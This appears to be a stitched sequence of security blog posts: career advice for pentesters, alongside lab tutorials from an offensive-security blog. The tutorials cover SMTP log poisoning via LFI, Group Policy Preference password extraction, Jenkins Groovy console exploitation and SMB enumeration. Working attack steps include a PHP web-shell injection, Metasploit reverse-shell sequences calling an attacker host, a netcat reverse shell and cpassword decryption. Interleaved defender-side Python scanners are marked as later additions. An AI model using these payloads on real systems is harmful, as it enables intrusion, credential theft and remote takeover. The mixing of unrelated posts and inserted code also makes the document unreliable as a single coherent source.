Not only can mentors help you acquire new technical skills, but they can also assist with soft skills such as identifying your strengths and weaknesses, how to better communicate and what pitfalls you might face when advancing your career. According to John White, here’s how to seek out a good mentor.

3. Attend security conferences

Security conferences are another great way to learn new skills, because you can not only attend keynote speeches to discover new topics but also participate in CTF challenges and training of all sorts. One great thing to do at conferences is networking with other professionals. That way, you’ll get an idea about what other career paths and jobs are like, and get a clearer view of what can work for you, too.

To know more about the wide range of security conferences 2019 has in store around the world, check out The Ethical Hacker Network’s Global Calendar of Security Events.

4. Network with other professionals

By networking with other professionals, you will discover new areas of security, techniques, skills or career paths available to take your own career to the next level. This is not just at conferences or online via LinkedIn but also at local meetups or online communities.

Another untapped resource could be the very company you already work for. If it’s a large organization, there might just be email lists or Slack channels of like-minded professionals whom you would never meet otherwise.

Who knows? You might even meet your future employer or business partner. 😉

5. Make good use of free resources

In an industry as tactical as cybersecurity, practical skills are a MUST. Many online tools are available for you to test and practice your skills at no cost to you! Here are a few examples:

Another proven way to build your skillset and get more confidence for free is by hunting for vulnerabilities and bugs on dedicated platforms, such as Bugcrowd. You’ve got nothing to lose, everything to win. Interested? Here’s how to get started with bug bounties.

6. Enroll in practical training courses

Finally, the most complete way to learn new skills and acquire real-life security know-how is by enrolling in an online training course. Online training courses are such good options because they allow you to learn at your own pace, from the comfort of your own home. Here’s what to look for in an online training course:

  • Non-expiry or lifetime access to course materials
  • Mobile-Accessible materials for studying on the go
  • Up-to-date study materials (in terms of what is taught and techniques used)
  • Highly practical training, with numerous virtual labs, preferably based on real-life scenarios
  • Different formats of training materials (slides, videos, labs, etc.)
  • Availability of practical certification, to prove your skills

To help security professionals stay up-to-date with the latest cyber threats and techniques to defend against them, numerous books, security conferences, free online resources, and practical training courses are at your disposal. Whatever options best fit you, be sure to remember that consistent practice and determination will always be the best path to success. For this reason, it shouldn’t just be your resolution for 2019, but rather make it your personal mission this year and beyond to take advantage of these opportunities. Good luck!

Aspiring to advance your InfoSec career? Have a look at our various red team and blue team training courses, or combine them for the best that purple-teaming can do for your resume.

SMTP Log Poisoning through LFI to Remote Code Execution

Hello friends!! Today we will be discussing SMTP log poisoning. But before getting into the details, kindly read our previous articles, “SMTP Lab Set-Up” and “Beginner Guide to File Inclusion Attack (LFI/RFI)”. Today you will see how we can exploit a web server by abusing the SMTP service if the web server is vulnerable to Local File Inclusion.

Let’s Start!!

With the help of Nmap, we scan for port 25, and the result shows that port 25 is open for the SMTP service.

nmap -p25 192.168.1.107

This attack is entirely based on a Local File Inclusion attack; therefore I took help from our previous article, where I created a PHP file that allows the user to include a file through the file parameter.

As a result, you can observe that we are able to access the /etc/passwd file of the victim machine.

Now, if you are able to access the mail.log file through the LFI, it means that mail.log is readable, and since the mail service writes to it for every delivery attempt we can infect the log file by injecting malicious code.

Now let’s try to enumerate further and connect to the SMTP port (25).

telnet 192.168.1.107 25

As we can see, we connected to the victim machine successfully. Now let’s try to send a mail from the command line (CLI) of this machine and pass the OS commands via the “RCPT TO” option. The mail.log file records an entry for every mail attempt made against the server, so taking advantage of this I will send malicious PHP code as a fake recipient, and it will be appended automatically to mail.log as a new log entry.

MAIL FROM:<rrajchandel@gmail.com>
RCPT TO:<?php system($_GET['c']); ?>

Note: We can ignore the “501 5.1.3 Bad recipient address syntax” server response seen in the above screenshot, because the mail program on the server (victim machine) is expecting us to enter an email address and not OS commands.

Our goal is to inject PHP into the logs; this stage is called log file poisoning. We can now read the contents of mail.log through the LFI and at the same time execute the command passed through the c parameter. Let’s execute ifconfig as the command to list the network interfaces and confirm the result in the given screenshot.

192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&c=ifconfig

You can observe its output in the page source, as shown in the image below:

This is called SMTP log poisoning, and through this type of vulnerability we can easily obtain a reverse shell on the victim’s machine.
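As an added defender-side example (not part of the original post), the following Python scans constructed mail.log and web access log lines for the two halves of this chain: PHP injected into an SMTP envelope field, and an include parameter pointed at a log or system file. The log formats, host names and sample lines are assumptions modelled on Postfix and Apache, not captured from the lab.

```python
"""Defender-side check for SMTP log poisoning through LFI.

Scans two constructed inputs: a Postfix-style mail.log, in which an SMTP
envelope field carries PHP instead of an address, and an Apache-style access
log, in which an include parameter points at a log or system file."""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List

# PHP open tags and the call names an injected web shell relies on
PHP_TAG_RE = re.compile(r"<\?(php\b|=)?", re.IGNORECASE)
DANGEROUS_CALL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.IGNORECASE)
# Postfix logs the envelope as from=<...> to=<...>; the lookahead makes the
# lazy match stop only at a '>' that is followed by the next key=value field
ENVELOPE_FIELD_RE = re.compile(r"\b(from|to)=<(.*?)>(?=\s+\w+=|\s*$)")
# include-style query parameters (file= is the one used by the page's lfi.php)
INCLUDE_PARAM_RE = re.compile(r'[?&](file|page|include|path)=([^&\s"]+)', re.IGNORECASE)
# a web application has no business including anything under these trees
SENSITIVE_PREFIXES = ("/var/log/", "/etc/", "/proc/")

# Constructed sample lines (assumed formats, not captured from the lab)
SAMPLE_MAIL_LOG = """\
Jan 10 12:00:01 web postfix/smtpd[1234]: connect from unknown[192.168.1.109]
Jan 10 12:00:05 web postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[192.168.1.109]: 501 5.1.3 Bad recipient address syntax; from=<rrajchandel@gmail.com> to=<?php system($_GET['c']); ?> proto=SMTP helo=<kali>
Jan 10 12:00:09 web postfix/smtpd[1234]: disconnect from unknown[192.168.1.109]
Jan 10 12:05:00 web postfix/smtpd[1240]: 7A1B2C3D4E: client=mail.example.com[192.168.1.50]
Jan 10 12:05:01 web postfix/qmgr[900]: 7A1B2C3D4E: from=<alice@example.com>, size=1432, nrcpt=1 (queue active)
"""
SAMPLE_ACCESS_LOG = """\
192.168.1.109 - - [10/Jan/2019:12:10:00 +0000] "GET /lfi/lfi.php?file=/var/log/mail.log&c=ifconfig HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Jan/2019:12:11:00 +0000] "GET /lfi/lfi.php?file=about.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.1.109 - - [10/Jan/2019:12:12:00 +0000] "GET /lfi/lfi.php?file=%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


@dataclass(frozen=True)
class Finding:
    lineno: int
    reason: str
    evidence: str


def scan_mail_log(log_text: str) -> List[Finding]:
    """Flag mail.log lines whose content looks like PHP rather than an address."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        tag = PHP_TAG_RE.search(line)
        call = DANGEROUS_CALL_RE.search(line)
        if not (tag or call):
            continue
        # name the envelope field that carried the payload, if it was one
        field = "line"
        for m in ENVELOPE_FIELD_RE.finditer(line):
            if PHP_TAG_RE.search(m.group(0)) or DANGEROUS_CALL_RE.search(m.group(0)):
                field = m.group(1)
                break
        hit = tag or call
        reason = "php_tag" if tag else "dangerous_call"
        findings.append(Finding(lineno, f"{reason} in {field}", line[hit.start():hit.start() + 60]))
    return findings


def scan_access_log(log_text: str) -> List[Finding]:
    """Flag requests whose include parameter resolves to a system or log path."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in INCLUDE_PARAM_RE.finditer(line):
            value = urllib.parse.unquote(m.group(2))  # catch %2F-encoded paths too
            if value.startswith(SENSITIVE_PREFIXES) or "../" in value:
                findings.append(Finding(lineno, f"lfi via {m.group(1).lower()}", value))
    return findings


if __name__ == "__main__":
    for f in scan_mail_log(SAMPLE_MAIL_LOG) + scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f.lineno}: {f.reason}: {f.evidence}")
```

Correlating a hit from each scanner for the same client address within a short window is the signal that the log was poisoned and then pulled through the include.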

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvport 8888
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.

Paste the copied malicious code into the URL as shown in the given image and execute it as the command.

When the above code executes, you will get meterpreter session 1 on the targeted web server.

msf exploit(web_delivery) > sessions 1
meterpreter > sysinfo

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post SMTP Log Poisoning through LFI to Remote Code Execution appeared first on Hacking Articles.

What Makes a Professional Penetration Tester?

Penetration testers, often called “ethical hackers,” are highly skilled professionals that test computer networks, systems, applications, etc. for vulnerabilities before malicious (or unethical) hackers do. Find out what it takes to be an invaluable pentester below.

The Role At A Glance

On a daily basis, penetration testers are in charge of protecting their organization’s networks, systems, and/or applications. To do that, they perform “ethical hacks” or “penetration tests” of networks to identify potential vulnerabilities and report them to higher authorities with professional recommendations. Their responsibilities are continuously expanding with the number of new threats each year.

There are 3 main career options for professional penetration testers: in-house, as part of a consulting firm (or their own consulting business), or as freelancers.

According to the Bureau of Labor Statistics (BLS), information security analysts, including penetration testers, make an annual median salary of $95,510. Additionally, their employment is expected to grow 28% by 2026, much faster than the average for all occupations.

Day-to-Day Responsibilities

On a daily basis, penetration testers are responsible for testing a company’s network, infrastructure, applications, etc. for vulnerabilities, ensuring that all assets are secure. In greater detail, pentesters will:

  • Conduct Tests on Networks and Applications: In an attempt to find potential vulnerabilities that companies may have on their systems, web, or mobile applications, penetration testers will test them for vulnerabilities.
  • Physical Security Assessments: Because vulnerabilities can be present on physical servers and networks, pentesters will test there too.
  • Conduct Security Audits: By conducting audits, penetration testers can establish the overall security risks of a company and recommend best practices to follow.
  • Analyze Security Policies: Companies often think they have strong security policies… until breached. Testing them with real-life scenarios will only confirm (or deny) such statements and policies.
  • Write Security Assessment Reports: Because no job is really done without a final report, penetration testers regroup their findings and recommendations in a penetration test report destined for either their employer or client.

Of course, responsibilities might vary depending on the seniority of professional pentesters, and the size and/or needs of the company they work for.

Necessary Skills

Professional penetration testers know that practical skills are crucial, but so are personal skills… Here are some of the most important skills to have to be a successful penetration tester:

TECHNICAL SKILLS:
  • System Security — The processes involved with keeping information confidential and assuring its integrity.
  • Network Security — The security testing methodology, techniques, and tools for networked PCs and devices.
  • Web Applications — The testing methodology, techniques, and tools for web applications.
  • Mobile Applications — The testing methodology, techniques, and tools for mobile applications.
  • WiFi Security — All the attack techniques and tools used against Wi-Fi networks, and how to detect them.
  • Social Engineering — Deep knowledge of the most modern social engineering attack techniques.
  • Advanced Reconnaissance & Enumeration — How to retrieve the most important pieces of information out of Active Directory, while remaining undetected.
  • Reverse Engineering — The techniques and tools to deconstruct software, malware, and all ranges of attacks.
PERSONAL SKILLS:
  • Organizational Skills — An important part of any penetration test is the reporting phase. To do that, pentesters need to stay organized throughout the pentest and note down all kinds of important information that they will be required to include in their final report. Clients often judge the work of pentesters by the quality of their report, hence the importance of being organized.
  • Writing Skills — While being organized is a great skill to have, pentesters should also have good writing skills. Most of the people that will read the pentest report will be executives at the C-suite level or from non-security fields. For them to understand your report and the recommendations to fix the vulnerabilities found, you need to be able to write in plain language, so steer clear of infosec jargon.

Penetration testing can be a rewarding career. Indeed, professionals in this field not only like their job for obvious financial reasons, but also find this job to be highly satisfying in terms of accomplishments.

Interested in starting out a career in penetration testing? Check out our Penetration Testing Professional (PTP) training course for yourself, get your free trial below.

Sources: Job Hero, Dark Reading


Penetration Testing on Group Policy Preferences

Hello Friends!! You might be aware of Group Policy Preferences in Windows Server 2008, which allow system administrators to set up specific configurations. They can be used to create a username and encrypted password on machines. But did you know that a normal user can elevate privileges to local administrator and probably compromise the security of the entire domain, because passwords in preference items are not secured?

Table of Content

  • What is Group Policy Preferences?
  • Why is using GPP to create a user account a bad idea?
  • Lab Set-Up Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy Preferences, GPP for short, permit administrators to configure and install Windows and application settings that were previously unavailable using Group Policy. One of the most useful features of GPP is the ability to store credentials in a policy; moreover, these policies can make all kinds of configuration changes to machines, such as:

  • Map drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why is using GPP to create a user account a bad idea?

If you use Microsoft GPP to create a local administrator account, consider the security consequences carefully, since the password is stored in SYSVOL in a preference item. SYSVOL is the domain-wide shared folder in Active Directory that is accessible to all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for a user or group account, it is associated with a Group.XML file created in SYSVOL holding the relevant configuration information, and the password in it is AES-256 encrypted. Because the AES key used is published by Microsoft and all authenticated users have access to SYSVOL, the password is not secure.

In this article, we will be doing Active Directory penetration testing through Group Policy Preferences and try to steal the stored password from inside SYSVOL in multiple ways.

Let’s Start!!

Lab Set-Up Requirement

  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to: Computer Configuration > Control Panel Settings > Local Users and Groups.

Then right-click in the “Local Users and Groups” pane and select New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the image given below, we created an account for the user “raaz”.

Don’t forget to update group policy configuration.

As discussed above, whenever a new GPP is created for a user or group account, it is associated with a Group.XML file stored inside SYSVOL.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this XML file holds the cpassword for user raaz within the Properties tag in plain text.
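An added audit example, not from the original post: the following Python walks a SYSVOL-like directory and reports every preference XML element that still carries a cpassword, which is the check a domain administrator would run before relying on the encryption. The directory layout and XML contents are constructed (the cpassword value for raaz is the one shown on this page); the preference file names are the ones Microsoft lists as able to hold credentials.

```python
"""Audit a SYSVOL tree for Group Policy Preference items that still embed a
cpassword attribute. The sample tree is built in a temporary directory from
constructed XML; nothing here is read from a real domain controller."""
import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Preference files that can embed credentials (the set addressed by MS14-025)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# attribute that names the account, depending on the preference type
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

# Constructed file contents (clsid/uid attributes omitted on purpose)
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="raaz" image="2" changed="2019-01-05 10:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80"
                changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="raaz"/>
  </User>
</Groups>
"""
DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="S:" changed="2019-01-05 10:00:00">
    <Properties action="U" path="\\\\fileserver\\share" label="Share" letter="S"/>
  </Drive>
</Drives>
"""
TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="Backup" changed="2019-01-05 10:00:00">
    <Properties action="C" name="Backup" runAs="PENTEST\\svc_backup"
                cpassword="CONSTRUCTED-CIPHERTEXT-NOT-REAL" appName="C:\\backup.bat"/>
  </Task>
</ScheduledTasks>
"""


@dataclass(frozen=True)
class GppCredential:
    path: str       # relative to the SYSVOL root
    account: str
    cpassword: str


def find_cpasswords(root: str) -> List[GppCredential]:
    """Return every preference element under root that carries a cpassword."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            try:
                tree = ET.parse(full)
            except ET.ParseError:
                continue  # malformed preference file: not parseable, skip here
            for elem in tree.iter():
                cpw = elem.get("cpassword")
                if not cpw:
                    continue  # attribute absent or empty: no stored password
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
                hits.append(GppCredential(os.path.relpath(full, root), account, cpw))
    return hits


def build_sample_sysvol() -> str:
    """Lay out a SYSVOL tree like the one on the page, populated from constructed XML."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    policy = os.path.join(root, "Pentest.Local", "Policies",
                          "{EE416E94-7362-4587-9CEC-651656DB7538}", "Machine", "Preferences")
    for sub, fname, body in (("Groups", "Groups.xml", GROUPS_XML),
                             ("Drives", "Drives.xml", DRIVES_XML),
                             ("ScheduledTasks", "ScheduledTasks.xml", TASKS_XML)):
        os.makedirs(os.path.join(policy, sub), exist_ok=True)
        with open(os.path.join(policy, sub, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    # The same walk over C:\ProgramData\Microsoft\Group Policy\History on an
    # endpoint finds the cached copies the page's post module reports.
    for hit in find_cpasswords(build_sample_sysvol()):
        print(f"{hit.path}: account={hit.account} cpassword={hit.cpassword}")
```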

Exploiting Group Policy Preferences via Metasploit -I

As we know, an authorized user can access SYSVOL. Suppose I know a client machine credential, let’s say raj:Ignite@123; with the help of this I can exploit Group Policy Preferences to get the XML file. The Metasploit auxiliary module lets you enumerate files from target domain controllers by connecting over SMB as a rogue user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe that it has dumped the password abcd@123 from inside the Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provides a post-exploitation module for enumerating cpassword, but for this you need to have compromised the target’s machine at least once; then you will be able to run the post module below.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the image given below you can observe that it found cpassword twice, in two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect to the target’s machine via SMB and try to access SYSVOL with the help of smbclient. Therefore execute the command below to access the shared directory with an authorized account, then move to the following path to get the Group.xml file: SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe, we have successfully transferred Group.xml to our local machine. As this file holds the cpassword, we now need to decrypt it.

For decryption we use gpp-decrypt, a simple Ruby script bundled with Kali Linux that decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gpp-decrypt <encrypted cpassword>
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plain text, as shown below.

GP3finder

This is another script, written in Python, for decrypting cpassword; you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gp3finder.exe -D <encrypted cpassword>
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plain text, as shown below.

PowerShell Empire

This is another framework, just like Metasploit, where you need to obtain a low-privilege shell first. Once you have exploited the target machine, use the privesc/gpp module to extract the password from inside the Group.xml file.

This module retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

agents
usemodule privesc/gpp
execute

As a result, it dumps the password in plain text, as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Penetration Testing on Group Policy Preferences appeared first on Hacking Articles.

Exploiting Jenkins Groovy Script Console in Multiple Ways

Hello Friends!! There are many ways to exploit Jenkins, however we were interested in the Script Console, because Jenkins has a lovely Groovy script console that permits anyone with access to it to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

  • Jenkins’ Groovy Script Console
  • Metasploit
  • revsh.groovy
  • Groovy executing shell commands -I
  • Groovy executing shell commands -II

Jenkins’ Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

  • Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
  • Read files that the Jenkins master has access to on the host (like /etc/passwd).
  • Decrypt credentials configured within Jenkins.
  • Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source : https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit

Metasploit uses a command stager to exploit the command injection.

Hence, you can observe that it has given us a meterpreter session on the victim’s machine.

revsh.groovy

If you find Jenkins without a login password, or you are a normal user who has permission to access the script console, then you can exploit this privilege to get a reverse shell on the machine. On the Jenkins Dashboard go to Manage Jenkins and then select Script Console.

In the script console you have full privilege to run any program code; therefore I tried to execute the following piece of code, which I took from GitHub, to get a reverse connection to my local machine via a netcat listener.

nc -lvp 1234

Once the above script is executed, it will give a netcat session on the victim’s machine.

Groovy executing shell commands -I

Similarly, with the help of the following piece of code, which I found here, I tried to get RCE for executing OS commands through the Groovy script console.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit the Groovy console here, which will give RCE and execute a shell command.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Exploiting Jenkins Groovy Script Console in Multiple Ways appeared first on Hacking Articles.

Our Amazing 2018, Thanks To You

Before 2018 has officially come and gone, let’s take a quick trip down memory lane and see the events that made up this amazing year.


That’s a wrap! The team would like to thank each and every one of you for trusting eLearnSecurity to advance your careers, always being an active part of our community, and for helping us reach new heights every year.

Happy New Year, everybody!


A Little Guide to SMB Enumeration

Enumeration is a very essential phase of penetration testing, because once a pentester has established an active connection with the victim, they try to retrieve as much information about the victim’s machine as possible, which could be useful for further exploitation.

In this article, we explore SMB enumeration using only the command-line tools built into Kali Linux.

Table of Content

  • Nmblookup
  • nbtscan
  • SMBMap
  • Smbclient
  • Rpcclient
  • Nmap
  • Enum4linux

nmblookup

nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine. All queries are done over UDP.

nmblookup -A 192.168.1.103

nmblookup is a helpful command for enumerating the domain/workstation name and MAC address. NetBIOS works with the help of NetBIOS suffixes, which convey the following information:

For unique names:

  • 00: Workstation Service (workstation name)
  • 03: Windows Messenger service
  • 06: Remote Access Service
  • 20: File Service (also called Host Record)
  • 21: Remote Access Service client
  • 1B: Domain Master Browser – Primary Domain Controller for a domain
  • 1D: Master Browser

For group names:

  • 00: Workstation Service (workgroup/domain name)
  • 1C: Domain Controllers for a domain
  • 1E: Browser Service Elections
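As an added example (not from the original post), this Python parses the status reply printed by nmblookup -A and classifies each name with the suffix tables above, so a host’s role (file server, domain controller, master browser) and MAC address can be pulled out of the reply. The reply below is constructed in the format Samba’s nmblookup uses; the host, workgroup and MAC values are made up.

```python
"""Parse `nmblookup -A <ip>` output and classify NetBIOS names by suffix.

The sample reply is constructed in Samba's output format; it is not a capture
from the lab described on the page."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Suffix tables as given above (unique names vs group names)
UNIQUE_SUFFIXES: Dict[int, str] = {
    0x00: "Workstation Service (workstation name)",
    0x03: "Windows Messenger service",
    0x06: "Remote Access Service",
    0x20: "File Service (Host Record)",
    0x21: "Remote Access Service client",
    0x1B: "Domain Master Browser (PDC)",
    0x1D: "Master Browser",
}
GROUP_SUFFIXES: Dict[int, str] = {
    0x00: "Workstation Service (workgroup/domain name)",
    0x1C: "Domain Controllers for a domain",
    0x1E: "Browser Service Elections",
}

# e.g. "\tPENTEST         <20> -         B <ACTIVE> " or "... - <GROUP> B <ACTIVE>"
NAME_LINE_RE = re.compile(
    r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+-\s+(<GROUP>)?\s*([BPMH])\s+<([A-Z]+)>")
MAC_LINE_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")

# Constructed reply (assumed values)
SAMPLE_REPLY = """\
Looking up status of 192.168.1.103
\tPENTEST         <00> -         B <ACTIVE> 
\tPENTEST         <20> -         B <ACTIVE> 
\tWORKGROUP       <00> - <GROUP> B <ACTIVE> 
\tWORKGROUP       <1e> - <GROUP> B <ACTIVE> 
\tWORKGROUP       <1d> -         B <ACTIVE> 
\t..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> 

\tMAC Address = 08-00-27-AB-CD-EF
"""


@dataclass(frozen=True)
class NbtName:
    name: str
    suffix: int
    is_group: bool
    node_type: str   # B/P/M/H node type letter
    status: str      # e.g. ACTIVE

    @property
    def meaning(self) -> str:
        table = GROUP_SUFFIXES if self.is_group else UNIQUE_SUFFIXES
        return table.get(self.suffix, "unknown suffix")


@dataclass
class NbtStatus:
    names: List[NbtName] = field(default_factory=list)
    mac: Optional[str] = None


def parse_nmblookup(text: str) -> NbtStatus:
    """Turn the raw reply into structured name records plus the MAC line."""
    status = NbtStatus()
    for line in text.splitlines():
        m = NAME_LINE_RE.match(line)
        if m:
            status.names.append(NbtName(m.group(1), int(m.group(2), 16),
                                        m.group(3) is not None, m.group(4), m.group(5)))
            continue
        mac = MAC_LINE_RE.search(line)
        if mac:
            status.mac = mac.group(1).upper()
    return status


def summarize(status: NbtStatus) -> Dict[str, object]:
    """Pull out what the page enumerates: host, workgroup/domain, roles, MAC."""
    def first(suffix: int, is_group: bool) -> Optional[str]:
        return next((n.name for n in status.names
                     if n.suffix == suffix and n.is_group == is_group), None)
    return {
        "hostname": first(0x00, False),
        "workgroup_or_domain": first(0x00, True),
        "file_service": first(0x20, False) is not None,
        "domain_controller": first(0x1C, True) is not None,   # 1C group = DCs
        "master_browser": first(0x1D, False) is not None or first(0x1B, False) is not None,
        "mac": status.mac,
    }


if __name__ == "__main__":
    parsed = parse_nmblookup(SAMPLE_REPLY)
    for n in parsed.names:
        print(f"{n.name:<16} <{n.suffix:02X}> {'GROUP ' if n.is_group else 'UNIQUE'} {n.meaning}")
    print(summarize(parsed))
```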

nbtscan

This is a command-line utility that scans for NetBIOS name servers open on a local or remote TCP/IP network, which is a first step in finding open shares. It builds on the functionality of the Windows standard tool “nbtstat”, but works on a whole subnet instead of an individual IP.

nbtscan 192.168.1.1/24

As you can observe, it has dumped almost the same result as above, but the most important fact is that it enumerates the whole subnet.

SMBMap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

smbmap -H 192.168.1.102
smbmap -H 192.168.1.102 -d metasploitable -u msfadmin -p msfadmin

As you can observe, this tool not only shows the shared files but also shows their permissions. If you look at the second command you will notice that it has shown the permissions for user “msfadmin”.

Smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.

smbclient -L 192.168.1.102
smbclient //192.168.1.102/tmp

As you can observe, with the help of smbclient we are able to view the shared folders of the victim’s machine. Moreover, we can use smbclient for sharing files over the network. Here you can observe that we logged in successfully using an anonymous login and transferred the user.txt file.

Rpcclient

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.

We can use rpcclient to open an authenticated SMB session to a target machine by running the below command on our system where we have used a NULL Session, as we have entered a username of “”.

rpcclient -U "" -N 192.168.1.102
enumdomusers

Next we used the enumdomusers command, and you can see the user names as well as their RIDs (the suffix of their SID) in hexadecimal form.

We use the queryuser command to retrieve all kinds of information about an individual user based solely on the user’s RID in hex form; here RID 0x3e8 denotes the root user account.

queryuser 0x3e8

Note that the output shows the last logon time for the user root, as well as the time the password was last set. Such information is very valuable for penetration testers, and all of this can be achieved without an admin user name and password.

Nmap

Following Script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

nmap --script smb-vuln* -p 139,445 192.168.1.103

